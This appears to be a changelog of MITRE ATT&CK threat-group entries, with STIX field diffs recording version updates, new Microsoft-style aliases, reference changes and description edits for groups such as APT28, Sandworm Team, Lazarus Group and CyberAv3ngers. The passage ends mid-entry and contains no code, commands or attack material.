x_mitre_version1.11.2

[G0075] Rancor

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:15:49.217000+00:002024-02-09 19:30:38.407000+00:00
x_mitre_version1.21.3

[G0121] Sidewinder

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 05:31:54.382000+00:002024-04-11 00:07:05.918000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[G1018] TA2541

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-10 17:19:36.480000+00:002024-04-10 22:38:45.199000+00:00
x_mitre_version1.01.1

[G0088] TEMP.Veles

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-30 22:46:40.135000+00:002024-04-17 16:13:43.697000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence

[G0139] TeamTNT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 21:35:03.147000+00:002024-04-10 22:34:04.070000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[G0027] Threat Group-3390

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-29 16:53:17.235000+00:002024-04-10 22:33:06.500000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[G0134] Transparent Tribe

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-22 20:27:21.053000+00:002024-04-10 22:30:51.062000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[G0081] Tropic Trooper

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 14:15:15.610000+00:002024-04-18 18:24:29.185000+00:00
x_mitre_version1.41.5
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsBart Parys

[G1017] Volt Typhoon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 15:45:14.731000+00:002024-03-28 04:14:40.834000+00:00
x_mitre_version1.01.1

[G0107] Whitefly

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:43:24.133000+00:002024-04-10 20:43:09.698000+00:00
x_mitre_version1.11.2
Patches

[G0022] APT3

Current version: 1.4


Old Description
New Description
t1[APT3](https://attack.mitre.org/groups/G0022) is a China-bast1[APT3](https://attack.mitre.org/groups/G0022) is a China-bas
>ed threat group that researchers have attributed to China's >ed threat group that researchers have attributed to China's 
>Ministry of State Security.(Citation: FireEye Clandestine Wo>Ministry of State Security.(Citation: FireEye Clandestine Wo
>lf)(Citation: Recorded Future APT3 May 2017) This group is r>lf)(Citation: Recorded Future APT3 May 2017) This group is r
>esponsible for the campaigns known as Operation Clandestine >esponsible for the campaigns known as Operation Clandestine 
>Fox, Operation Clandestine Wolf, and Operation Double Tap.(C>Fox, Operation Clandestine Wolf, and Operation Double Tap.(C
>itation: FireEye Clandestine Wolf)(Citation: FireEye Operati>itation: FireEye Clandestine Wolf)(Citation: FireEye Operati
>on Double Tap) As of June 2015, the group appears to have sh>on Double Tap) As of June 2015, the group appears to have sh
>ifted from targeting primarily US victims to primarily polit>ifted from targeting primarily US victims to primarily polit
>ical organizations in Hong Kong.(Citation: Symantec Buckeye)>ical organizations in Hong Kong.(Citation: Symantec Buckeye)
>  In 2017, MITRE developed an APT3 Adversary Emulation Plan. 
>(Citation: APT3 Adversary Emulation Plan) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-01 19:09:20.817000+00:002024-02-06 17:49:35.261000+00:00
description[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye) In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'APT3 Adversary Emulation Plan', 'description': 'Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.', 'url': 'https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf'}

mobile-attack

New Groups

[G1028] APT-C-23

Current version: 1.0

Description: [APT-C-23](https://attack.mitre.org/groups/G1028) is a threat group that has been active since at least 2014.(Citation: symantec_mantis) [APT-C-23](https://attack.mitre.org/groups/G1028) has primarily focused its operations on the Middle East, including Israeli military assets. [APT-C-23](https://attack.mitre.org/groups/G1028) has developed mobile spyware targeting Android and iOS devices since 2017.(Citation: welivesecurity_apt-c-23)


[G1002] BITTER

Current version: 1.1

Description: [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)


[G0056] PROMETHIUM

Current version: 2.1

Description: [PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)


[G1015] Scattered Spider

Current version: 2.0

Description: [Scattered Spider](https://attack.mitre.org/groups/G1015) is a native English-speaking cybercriminal group that has been active since at least 2022.(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023) The group initially targeted customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. Beginning in 2023, [Scattered Spider](https://attack.mitre.org/groups/G1015) expanded its operations to compromise victims in the gaming, hospitality, retail, MSP, manufacturing, and financial sectors.(Citation: MSTIC Octo Tempest Operations October 2023) During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques, attempted to bypass popular endpoint security tools, and more recently, deployed ransomware for financial gain.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)


[G1029] UNC788

Current version: 1.0

Description: [UNC788](https://attack.mitre.org/groups/G1029) is a group of hackers from Iran that has targeted people in the Middle East.(Citation: Meta Adversarial Threat Report 2022)

Major Version Changes

[G0007] APT28

Current version: 5.0

Version changed from: 4.0 → 5.0


Old Description
New Description
t1[APT28](https://attack.mitre.org/groups/G0007) is a threat gt1[APT28](https://attack.mitre.org/groups/G0007) is a threat g
>roup that has been attributed to Russia's General Staff Main>roup that has been attributed to Russia's General Staff Main
> Intelligence Directorate (GRU) 85th Main Special Service Ce> Intelligence Directorate (GRU) 85th Main Special Service Ce
>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub
> August 2020)(Citation: Cybersecurity Advisory GRU Brute For> August 2020)(Citation: Cybersecurity Advisory GRU Brute For
>ce Campaign July 2021) This group has been active since at l>ce Campaign July 2021) This group has been active since at l
>east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: >east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: 
>Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike >Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike 
>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork
>s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G>s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G
>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:
> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018
>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m
>itre.org/groups/G0007) reportedly compromised the Hillary Cl>itre.org/groups/G0007) reportedly compromised the Hillary Cl
>inton campaign, the Democratic National Committee, and the D>inton campaign, the Democratic National Committee, and the D
>emocratic Congressional Campaign Committee in 2016 in an att>emocratic Congressional Campaign Committee in 2016 in an att
>empt to interfere with the U.S. presidential election. (Cita>empt to interfere with the U.S. presidential election.(Citat
>tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi>ion: Crowdstrike DNC June 2016) In 2018, the US indicted fiv
>ve GRU Unit 26165 officers associated with [APT28](https://a>e GRU Unit 26165 officers associated with [APT28](https://at
>ttack.mitre.org/groups/G0007) for cyber operations (includin>tack.mitre.org/groups/G0007) for cyber operations (including
>g close-access operations) conducted between 2014 and 2018 a> close-access operations) conducted between 2014 and 2018 ag
>gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi>ainst the World Anti-Doping Agency (WADA), the US Anti-Dopin
>ng Agency, a US nuclear facility, the Organization for the P>g Agency, a US nuclear facility, the Organization for the Pr
>rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi>ohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemic
>cals Laboratory, and other organizations.(Citation: US Distr>als Laboratory, and other organizations.(Citation: US Distri
>ict Court Indictment GRU Oct 2018) Some of these were conduc>ct Court Indictment GRU Oct 2018) Some of these were conduct
>ted with the assistance of GRU Unit 74455, which is also ref>ed with the assistance of GRU Unit 74455, which is also refe
>erred to as [Sandworm Team](https://attack.mitre.org/groups/>rred to as [Sandworm Team](https://attack.mitre.org/groups/G
>G0034). >0034). 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 17:51:20.401000+00:002024-04-04 19:07:48.903000+00:00
description[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version4.05.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesForest Blizzard
aliasesFROZENLAKE
external_references{'source_name': 'FROZENLAKE', 'description': '(Citation: Leonard TAG 2023)'}
external_references{'source_name': 'Forest Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1006] Earth Lusca

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 19:51:56.531000+00:002024-04-10 21:38:24.226000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCharcoal Typhoon
aliasesCHROMIUM
aliasesControlX
external_references{'source_name': 'Charcoal Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'ControlX', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'CHROMIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023) (Citation: Recorded Future RedHotel August 2023)'}
external_references{'source_name': 'Recorded Future RedHotel August 2023', 'description': 'Insikt Group. (2023, August 8). RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale. Retrieved March 11, 2024.', 'url': 'https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-06 14:13:06.011000+00:002024-04-06 19:05:38.712000+00:00
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSeashell Blizzard
aliasesFROZENBARENTS
external_references{'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references{'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
Minor Version Changes

[G0070] Dark Caracal

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-11 19:08:18.503000+00:002024-04-11 02:42:07.325000+00:00
x_mitre_version1.31.4

ics-attack

New Groups

[G1027] CyberAv3ngers

Current version: 1.0

Description: The [CyberAv3ngers](https://attack.mitre.org/groups/G1027) are a suspected Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated APT group. The [CyberAv3ngers](https://attack.mitre.org/groups/G1027) have been known to be active since at least 2020, with disputed and false claims of critical infrastructure compromises in Israel.(Citation: CISA AA23-335A IRGC-Affiliated December 2023) In 2023, the [CyberAv3ngers](https://attack.mitre.org/groups/G1027) engaged in a global targeting and hacking of the Unitronics [Programmable Logic Controller (PLC)](https://attack.mitre.org/assets/A0003) with [Human-Machine Interface (HMI)](https://attack.mitre.org/assets/A0002). This PLC can be found in multiple sectors, including water and wastewater, energy, food and beverage manufacturing, and healthcare. The most notable feature of this attack was the defacement of the devices user interface.(Citation: CISA AA23-335A IRGC-Affiliated December 2023)

Major Version Changes

[G0064] APT33

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
New Description
t1[APT33](https://attack.mitre.org/groups/G0064) is a suspectet1[APT33](https://attack.mitre.org/groups/G0064) is a suspecte
>d Iranian threat group that has carried out operations since>d Iranian threat group that has carried out operations since
> at least 2013. The group has targeted organizations across > at least 2013. The group has targeted organizations across 
>multiple industries in the United States, Saudi Arabia, and >multiple industries in the United States, Saudi Arabia, and 
>South Korea, with a particular interest in the aviation and >South Korea, with a particular interest in the aviation and 
>energy sectors. (Citation: FireEye APT33 Sept 2017) (Citatio>energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation:
>n: FireEye APT33 Webinar Sept 2017)> FireEye APT33 Webinar Sept 2017)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-08 22:07:25.123000+00:002024-04-11 16:06:34.700000+00:00
description[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.42.0
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesPeach Sandstorm
external_references{'source_name': 'Peach Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0082] APT38

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[APT38](https://attack.mitre.org/groups/G0082) is a North Kot1[APT38](https://attack.mitre.org/groups/G0082) is a North Ko
>rean state-sponsored threat group that specializes in financ>rean state-sponsored threat group that specializes in financ
>ial cyber operations; it has been attributed to the Reconnai>ial cyber operations; it has been attributed to the Reconnai
>ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A>ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A
>ugust 2020) Active since at least 2014, [APT38](https://atta>ugust 2020) Active since at least 2014, [APT38](https://atta
>ck.mitre.org/groups/G0082) has targeted banks, financial ins>ck.mitre.org/groups/G0082) has targeted banks, financial ins
>titutions, casinos, cryptocurrency exchanges, SWIFT system e>titutions, casinos, cryptocurrency exchanges, SWIFT system e
>ndpoints, and ATMs in at least 38 countries worldwide. Signi>ndpoints, and ATMs in at least 38 countries worldwide. Signi
>ficant operations include the 2016 Bank of Bangladesh heist,>ficant operations include the 2016 Bank of Bangladesh heist,
> during which [APT38](https://attack.mitre.org/groups/G0082)> during which [APT38](https://attack.mitre.org/groups/G0082)
> stole $81 million, as well as attacks against Bancomext (20> stole $81 million, as well as attacks against Bancomext (Ci
>18) and Banco de Chile (2018); some of their attacks have be>tation: FireEye APT38 Oct 2018) and Banco de Chile (Citation
>en destructive.(Citation: CISA AA20-239A BeagleBoyz August 2>: FireEye APT38 Oct 2018); some of their attacks have been d
>020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North K>estructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)
>orea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under >(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea
>The Hood Blog 2017)  North Korean group definitions are know> Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The 
>n to have significant overlap, and some security researchers>Hood Blog 2017)  North Korean group definitions are known to
> report all North Korean state-sponsored cyber activity unde> have significant overlap, and some security researchers rep
>r the name [Lazarus Group](https://attack.mitre.org/groups/G>ort all North Korean state-sponsored cyber activity under th
>0032) instead of tracking clusters or subgroups.>e name [Lazarus Group](https://attack.mitre.org/groups/G0032
 >) instead of tracking clusters or subgroups.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-01-18 17:13:14.610000+00:002024-04-17 22:08:29.146000+00:00
description[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSapphire Sleet
aliasesCOPERNICIUM
external_references{'source_name': 'Sapphire Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'COPERNICIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0035] Dragonfly

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 02:45:48.973000+00:002024-01-08 20:40:31.822000+00:00
x_mitre_version3.24.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGhost Blizzard
aliasesBROMINE
external_references{'source_name': 'Ghost Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BROMINE', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0037] FIN6

Current version: 4.0

Version changed from: 3.3 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:50:17.471000+00:002024-01-08 22:13:27.588000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.34.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesTAAL
aliasesCamouflage Tempest
external_references{'source_name': 'TAAL', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Camouflage Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0046] FIN7

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-04 18:10:49.054000+00:002024-04-17 22:09:41.004000+00:00
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesELBRUS
aliasesSangria Tempest
external_references{'source_name': 'ELBRUS', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references{'source_name': 'Sangria Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}

[G0032] Lazarus Group

Current version: 4.0

Version changed from: 3.2 → 4.0


Old Description
New Description
t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a t1[Lazarus Group](https://attack.mitre.org/groups/G0032) is a 
>North Korean state-sponsored cyber threat group that has bee>North Korean state-sponsored cyber threat group that has bee
>n attributed to the Reconnaissance General Bureau.(Citation:>n attributed to the Reconnaissance General Bureau.(Citation:
> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko> US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko
>rean Cyber Groups September 2019) The group has been active >rean Cyber Groups September 2019) The group has been active 
>since at least 2009 and was reportedly responsible for the N>since at least 2009 and was reportedly responsible for the N
>ovember 2014 destructive wiper attack against Sony Pictures >ovember 2014 destructive wiper attack against Sony Pictures 
